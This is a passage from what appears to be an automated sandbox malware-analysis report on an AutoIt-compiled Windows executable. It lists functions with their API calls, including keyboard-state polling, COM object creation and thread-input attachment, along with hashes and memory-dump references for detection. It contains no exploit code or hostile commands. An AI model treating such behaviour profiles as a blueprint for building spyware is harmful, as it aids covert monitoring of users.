                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1237572874-0
                                                                                                                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                                                    Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                    • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                                                    • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                                                    Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                                                    Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3413494760-0
                                                                                                                                                    • Opcode ID: 16f8fa2627d0cf4fc500c06a07b70b857d3e661ade40dc31cc78a2c5b3600a28
                                                                                                                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                    • Opcode Fuzzy Hash: 16f8fa2627d0cf4fc500c06a07b70b857d3e661ade40dc31cc78a2c5b3600a28
                                                                                                                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                    Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                                                    • String ID: AU3_FreeVar
                                                                                                                                                    • API String ID: 2634073740-771828931
                                                                                                                                                    • Opcode ID: 923fa0a7059ff83e982d885d87b1b243233484feeca3d047820b52f06f013e18
                                                                                                                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                                                    • Opcode Fuzzy Hash: 923fa0a7059ff83e982d885d87b1b243233484feeca3d047820b52f06f013e18
                                                                                                                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                                                    Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                    • API String ID: 2294789929-1287834457
                                                                                                                                                    • Opcode ID: 8b80c77c2bdaea75eec11ce758cd2f9ec9f4a29dfe234f2e260ca4a41de31459
                                                                                                                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                    • Opcode Fuzzy Hash: 8b80c77c2bdaea75eec11ce758cd2f9ec9f4a29dfe234f2e260ca4a41de31459
                                                                                                                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                    Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                    • API String ID: 2483343779-2107944366
                                                                                                                                                    • Opcode ID: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
                                                                                                                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                    • Opcode Fuzzy Hash: 8242c973631ce46dc2107a793a2d3124409766f4a4f9f3ff38e174e62d65e23e
                                                                                                                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                    Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                                                    • _wcslen.LIBCMT ref: 00450720
                                                                                                                                                    • _wcscat.LIBCMT ref: 00450733
                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                    • String ID: -----$SysListView32
                                                                                                                                                    • API String ID: 4008455318-3975388722
                                                                                                                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                                                    Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                                                    • GetParent.USER32 ref: 00469C98
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                                                    • GetParent.USER32 ref: 00469CBC
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 2360848162-1403004172
                                                                                                                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                                                    Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 262282135-0
                                                                                                                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                                    Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                                    Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
